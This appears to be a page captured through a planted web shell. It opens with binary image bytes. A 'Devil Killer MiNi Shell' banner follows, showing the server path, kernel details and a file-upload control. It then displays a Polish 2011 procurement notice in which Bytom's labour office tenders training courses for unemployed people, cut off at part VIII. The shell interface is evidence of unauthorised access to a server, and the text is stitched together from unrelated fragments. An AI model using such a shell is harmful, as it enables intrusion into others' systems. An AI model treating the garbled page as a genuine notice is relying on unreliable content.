JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110413/75606-N-2011.html

<p class="kh_header"><b>Bytom: Szkolenia osób bezrobotnych, w podziale na XXI  części,  finansowane ze środków EFS.</b><br>
<b>Numer ogłoszenia: 75606 - 2011; data zamieszczenia: 13.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupbytom.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia osób bezrobotnych, w podziale na XXI  części,  finansowane ze środków EFS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia osób bezrobotnych zarejestrowanych                                 w Powiatowym Urzędzie Pracy w Bytomiu w podziale na  XXI  części. 
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin (dotyczy części IV, V, VII, VIII)             oraz 2 godzin (dotyczy pozostałych części). 
Koszt dojazdu do miejsca odbywania szkolenia i z powrotem pokrywa uczestnik szkolenia. 
Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8:00 kończyć nie później niż  o godzinie 19:00), w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godz. zegarowych w tygodniu.

Zamawiający skieruje osoby bezrobotne, zakwalifikowane na dane szkolenie, na badania lekarskie i psychologiczne określone w programie szkolenia we własnym zakresie i na własny koszt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.53.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać zaktualizowany na 2010 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia                      i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż przeprowadził w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 szkolenia odpowiadające rodzajem  szkoleniu stanowiącemu przedmiot zamówienia oraz przedłoży dokument potwierdzający ich należyte wykonanie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lub będzie dysponował lokalem obejmującym co najmniej:
a) salę wykładową posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
      b)   WC,
      c)   pomieszczenie umożliwiające przygotowanie i spożycie posiłku oraz przygotowanie
            ciepłych i zimnych napojów                                                                                                 oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	strona tytułowa - OFERTA,
2)	preliminarz kosztów szkolenia 
3)	program szkolenia 
4)	pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, jeżeli nie wynika ono z dokumentów przedłożonych w ofercie; w tym wynikające z art. 23 ustawy Prawo zamówień publicznych lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w przypadku gdy ofertę składa osoba fizyczna.
5)	wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom - dotyczy wyłącznie Wykonawców, którzy zamierzają powierzyć wykonanie części zamówienia podwykonawcom .
6) zobowiązanie podmiotu do oddania do dyspozycji wykonawcy potencjału niezbędnego do realizacji zamówienia-jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, za     
     wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
a)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
b)	zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy
c)	zmiany osób odpowiedzialnych za realizację niniejszej umowy,
d)	zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupbytom.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 41-902 Bytom
ul. Łagiewnicka 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2011 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 20 - Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Europejskiego Funduszu Społecznego. Priorytet VI Rynek pracy otwarty dla wszystkich Działanie 6.1.3. Poprawa zdolnosci do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych. GOTOWI DO PRACY..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I

FLORYSTA - DESIGNER. 
SAMODZIELNY KREATOR DEKORACJI KWIATOWYCH..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 300. Szkolenie winno zawierać następujące przedmioty nauczania:

	Podstawowe wiadomości z anatomii, fizjologii i biologii oraz produkcji roślin ozdobnych,
	Podział i przegląd roślin ozdobnych,
	Artykuły stosowne do aranżacji roślin ozdobnych,
	Tworzenie układów kompozycyjnych z roślin żywych i utrwalonych,
	Florystyka okolicznościowa / stroiki na Boże Narodzenie i dekoracje wielkanocne/, ślubna /wiązanka biedermajerowska, spływająca, fantazyjna/, komunijnych /wianek, zdobienie świecy i wiązanka komunijna/ i żałobna /wieniec obręczowy, poduszkowy, rzymski, dekoracje w kształcie krzyża i serca/
	Dekorowanie florystyczne wnętrz /sal, kościołów/ i imprez plenerowych
	Artystyczne pakowanie  prezentów
	Elementy decoupage.
	Ogólne zasady projektowania małych ogrodów, klombów sezonowych, mis i skrzynek kwiatowych.
	Obsługa kasy fiskalnej,
	Podstawy obsługi komputera;
	Organizacja i techniki sprzedaży materiału roślinnego,
	Urządzenie i organizacja miejsca sprzedaży,
	BHP
	Pierwsza pomoc przedlekarska

Zamówienie obejmuje  przeszkolenie łącznie 20 osób, w dwóch dziesięcioosobowych grupach        i realizowane będzie w terminie wskazanym przez Zamawiającego  - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II

MAGAZYNIER - HURTOWNIK Z MODUŁEM OBSŁUGI KASY FISKALNEJ                  I WÓZKA JEZDNIOWEGO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 220. Szkolenie winno zawierać następujące przedmioty nauczania:

	gospodarka magazynowa w przedsiębiorstwie produkcyjnym  i handlowym,
	dokumentacja magazynowa,
	 inwentaryzacja stanów magazynowych,
	gospodarka zapasami,
	sprawozdania i analizy,
	podstawy obsługi komputera i komputerowych programów handlowych,
	obsługa kas fiskalnych,
	operator wózka jezdniowego.
	szkolenie z zakresu przestrzegania zasad higieny w procesie produkcji i obrocie żywnością
	pierwsza pomoc przedlekarska

Zamówienie obejmuje przeszkolenie łącznie 30 osób, w trzech grupach dziesięcioosobowych                i  realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do     31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III

OBSŁUGA KASY FISKALNEJ Z TERMINALEM KART PŁATNICZYCH                          I SPRZEDAŻĄ INTERNETOWĄ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 150. Szkolenie winno zawierać następujące przedmioty nauczania:

	Zakres i obowiązki kasjera;
	Techniki sprzedaży;
	Podstawy obsługi klienta;
	Kasy i drukarki fiskalne - sprzedaż hurtowa i detaliczna z wykorzystaniem kas                   i drukarek fiskalnych - budowa i obsługa, BHP przy urządzeniach elektrycznych;
	Obsługa komputera;
	Programowanie kasy fiskalnej przy użyciu programu komputerowego;
	Karty płatnicze - opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne,  wykonywanie transakcji kartami płatniczymi, budowa terminala/PINpada, problemy występujące w czasie instalacji terminala PINpada;
	Doładowania telefonów komórkowych;
	Rozliczanie placówki handlowej i kasjerów;
	Sprzedaż internetowa;
	HACCP;
	Praca w sieci, obsługa sklepu, hurtowni i placówki małej gastronomii.

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV

OPERATOR ŁADOWAWRKI KL. III DO 2,5 M3 ZE WSTĘPNYM STAŻEM PRACY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 202. Szkolenie winno zawierać następujące przedmioty nauczania:

	Użytkowanie eksploatacyjne; 
	dokumentacja techniczna;
	BHP; 
	podstawy elektrotechniki;
	silniki spalinowe;
	elementy hydrauliki; 
	budowa ładowarek jednonaczyniowych
	technologia robot 
	zajęcia praktyczne .

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie podanym przez Zamawiającego, od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V  

OPERATOR KOPARKOŁADOWARKI KL. III ZE WSĘPNYM STAŻEM PRACY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 202. Szkolenie winno zawierać następujące przedmioty nauczania:

	Użytkowanie eksploatacyjne; 
	dokumentacja techniczna;
	BHP; 
	podstawy elektrotechniki;
	silniki spalinowe;
	elementy hydrauliki; 
	budowa koparko - ładowarki;
	technologia robót;
	zajęcia praktyczne .
Zamówienie obejmuje przeszkolenie łącznie 15 i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany    w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI 

PORTIER - KONSERWATOR..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 350. Szkolenie winno zawierać następujące przedmioty nauczania:

	Elementy elektryki - drobne prace przy instalacji niskiego napięcia,  
	Elementy hydrauliki , 
	Konserwacja i utrzymanie dobrego stanu urządzeń technicznych - malowanie, uzupełnianie ubytków w glazurze i powierzchniach płaskich i perforowanych, zbijanie starego tynku, wyrównywanie podłoża, drobne naprawy ślusarskie, szklenie, drobne prace stolarskie, 
	Utrzymanie porządku we wnętrz budynku,
	Podstawowe zagadnienia ochrony osób i mienia,
	Konserwacja terenów zielonych - wykaszarki, wycinarki, nożyce do żywopłotu, kosiarki, opryskiwacze,
	Prace przy pomocy elektronarzędzi,
	Uprawnienia palacza CO, na paliwa stałe, ciekłe i gazowe

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie wskazanym przez Zamawiającego, od podpisania umowy do 31 października 2011  r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII 

SPAWANIE BLACH I RUR SPOINAMI PACHWINOWYMI MET. MAG (135)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 184. Szkolenie winno zawierać następujące przedmioty nauczania:
	Zagadnienia z zakresu procesów spawalniczych, 
	Technika spawania;
	Technologia spawania;
	Urządzenia i materiały do spawania
Program zgodny z wytycznymi Instytutu Spawalnictwa, poszerzony przez jednostkę szkoleniową o dodatkowe godziny zajęć praktycznych.

Absolwenci uzyskają uprawnienia wydane przez Instytut Spawalnictwa.

Zamówienie obejmuje przeszkolenie łącznie 15 osób i realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2011 r. Dokładny termin rozpoczęcia i zakończenia szkolenia zostanie podany     w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> CZĘŚĆ VIII 

